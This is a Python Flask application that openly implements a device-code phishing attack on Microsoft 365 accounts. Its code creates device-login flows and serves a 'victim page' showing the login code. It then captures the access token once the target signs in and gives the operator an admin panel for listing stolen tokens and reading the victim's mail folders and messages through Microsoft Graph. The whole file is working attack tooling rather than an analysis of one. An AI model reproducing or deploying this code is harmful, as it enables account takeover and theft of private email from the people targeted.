import os
import uuid
import threading
import requests
import base64
from functools import wraps
from flask import Flask, render_template, jsonify, request, abort, session, Response
from msal import PublicClientApplication
from dotenv import load_dotenv

load_dotenv()

app = Flask(__name__)
app.secret_key = os.urandom(24).hex()

# Configuration
CLIENT_ID = os.getenv("CLIENT_ID")
TENANT_ID = os.getenv("TENANT_ID", "common")
SCOPES = os.getenv("SCOPES", "User.Read Mail.Read").split()
AUTHORITY = f"https://login.microsoftonline.com/{TENANT_ID}"
ADMIN_PASSWORD = os.getenv("ADMIN_PASSWORD")  # if set, enable basic auth

# In‑memory storage for active flows (use a database in production)
active_flows = {}

def build_msal_app():
    return PublicClientApplication(CLIENT_ID, authority=AUTHORITY)

# -------------------- Simple Basic Auth for Admin --------------------
def check_auth(username, password):
    return username == "admin" and password == ADMIN_PASSWORD

def authenticate():
    return Response(
        "Authentication required", 401,
        {"WWW-Authenticate": "Basic realm='Admin Panel'"}
    )

def requires_auth(f):
    @wraps(f)
    def decorated(*args, **kwargs):
        if ADMIN_PASSWORD:
            auth = request.authorization
            if not auth or not check_auth(auth.username, auth.password):
                return authenticate()
        return f(*args, **kwargs)
    return decorated

# -------------------- Graph API Helpers --------------------
def fetch_user_profile(access_token):
    headers = {"Authorization": f"Bearer {access_token}"}
    try:
        resp = requests.get("https://graph.microsoft.com/v1.0/me", headers=headers, timeout=10)
        return resp.json() if resp.status_code == 200 else {"error": f"HTTP {resp.status_code}"}
    except Exception as e:
        return {"error": str(e)}

def fetch_folders(access_token):
    headers = {"Authorization": f"Bearer {access_token}"}
    url = "https://graph.microsoft.com/v1.0/me/mailFolders?$top=50"
    try:
        resp = requests.get(url, headers=headers, timeout=10)
        return resp.json() if resp.status_code == 200 else {"error": f"HTTP {resp.status_code}"}
    except Exception as e:
        return {"error": str(e)}

def fetch_emails(access_token, folder_id="inbox", top=20):
    """Fetch messages with full body (HTML and text)."""
    headers = {"Authorization": f"Bearer {access_token}"}
    # Request both body and bodyPreview to have full content
    url = f"https://graph.microsoft.com/v1.0/me/mailFolders/{folder_id}/messages?$top={top}&$select=id,subject,from,receivedDateTime,isRead,body,bodyPreview"
    try:
        resp = requests.get(url, headers=headers, timeout=10)
        return resp.json() if resp.status_code == 200 else {"error": f"HTTP {resp.status_code}"}
    except Exception as e:
        return {"error": str(e)}

def fetch_single_message(access_token, message_id):
    """Fetch a single message with full body."""
    headers = {"Authorization": f"Bearer {access_token}"}
    url = f"https://graph.microsoft.com/v1.0/me/messages/{message_id}?$select=id,subject,from,receivedDateTime,isRead,body,bodyPreview"
    try:
        resp = requests.get(url, headers=headers, timeout=10)
        return resp.json() if resp.status_code == 200 else {"error": f"HTTP {resp.status_code}"}
    except Exception as e:
        return {"error": str(e)}

# -------------------- Attacker Admin Interface --------------------
@app.route("/")
@requires_auth
def admin():
    return render_template("admin.html")

@app.route("/api/start", methods=["POST"])
@requires_auth
def start_flow():
    app_msal = build_msal_app()
    flow = app_msal.initiate_device_flow(scopes=SCOPES)
    if "user_code" not in flow:
        return jsonify({"error": "Failed to start device flow", "details": flow}), 400

    flow_id = str(uuid.uuid4())
    active_flows[flow_id] = {
        "flow": flow,
        "result": None,
        "profile": None
    }

    def poll_for_token():
        result = app_msal.acquire_token_by_device_flow(flow)
        profile = None
        if "access_token" in result:
            profile = fetch_user_profile(result["access_token"])
        active_flows[flow_id]["result"] = result
        active_flows[flow_id]["profile"] = profile

    thread = threading.Thread(target=poll_for_token)
    thread.daemon = True
    thread.start()

    return jsonify({
        "flow_id": flow_id,
        "user_code": flow["user_code"],
        "verification_uri": flow["verification_uri"],
        "expires_in": flow["expires_in"]
    })

@app.route("/api/flows", methods=["GET"])
@requires_auth
def list_flows():
    flows_list = []
    for fid, data in active_flows.items():
        flow = data["flow"]
        result = data["result"]
        profile = data["profile"]
        status = "pending"
        token = None
        user_name = None
        user_email = None
        error = None
        if result is not None:
            if "access_token" in result:
                status = "success"
                token = result["access_token"]
                if profile and "error" not in profile:
                    user_name = profile.get("displayName")
                    user_email = profile.get("mail") or profile.get("userPrincipalName")
                else:
                    user_name = result.get("id_token_claims", {}).get("name")
            else:
                status = "error"
                error = result.get("error_description") or result.get("error")
        flows_list.append({
            "flow_id": fid,
            "user_code": flow["user_code"],
            "status": status,
            "token": token,
            "user_name": user_name,
            "user_email": user_email,
            "error": error,
        })
    return jsonify(flows_list)

# -------------------- Victim Page --------------------
@app.route("/v/<flow_id>")
def victim_page(flow_id):
    data = active_flows.get(flow_id)
    if not data:
        abort(404, description="Invalid or expired link.")
    flow = data["flow"]
    user_code = flow["user_code"]
    return render_template("victim.html", user_code=user_code, flow_id=flow_id)

# -------------------- Email Viewer for Attacker --------------------
@app.route("/emails/<flow_id>")
@requires_auth
def view_emails(flow_id):
    data = active_flows.get(flow_id)
    if not data:
        abort(404, description="Flow not found.")
    result = data["result"]
    if not result or "access_token" not in result:
        abort(400, description="No valid access token for this flow.")
    token = result["access_token"]

    folders_data = fetch_folders(token)
    folders = folders_data.get("value", []) if "error" not in folders_data else []
    # Initially load inbox messages
    messages_data = fetch_emails(token, folder_id="inbox", top=50)
    messages = messages_data.get("value", []) if "error" not in messages_data else []
    error = folders_data.get("error") or messages_data.get("error")

    return render_template("emails.html",
                           flow_id=flow_id,
                           folders=folders,
                           messages=messages,
                           error=error,
                           user_email=data["profile"].get("mail") or data["profile"].get("userPrincipalName") if data["profile"] else "Unknown")

@app.route("/api/emails/<flow_id>/<folder_id>")
@requires_auth
def api_emails(flow_id, folder_id):
    """AJAX endpoint to fetch messages for a specific folder."""
    data = active_flows.get(flow_id)
    if not data:
        return jsonify({"error": "Flow not found"}), 404
    result = data["result"]
    if not result or "access_token" not in result:
        return jsonify({"error": "No valid token"}), 400
    token = result["access_token"]
    msgs = fetch_emails(token, folder_id=folder_id, top=50)
    return jsonify(msgs)

@app.route("/api/message/<flow_id>/<message_id>")
@requires_auth
def api_message(flow_id, message_id):
    """Fetch full details of a single message."""
    data = active_flows.get(flow_id)
    if not data:
        return jsonify({"error": "Flow not found"}), 404
    result = data["result"]
    if not result or "access_token" not in result:
        return jsonify({"error": "No valid token"}), 400
    token = result["access_token"]
    msg = fetch_single_message(token, message_id)
    return jsonify(msg)

if __name__ == "__main__":
    app.run(debug=True, host="0.0.0.0", port=5000)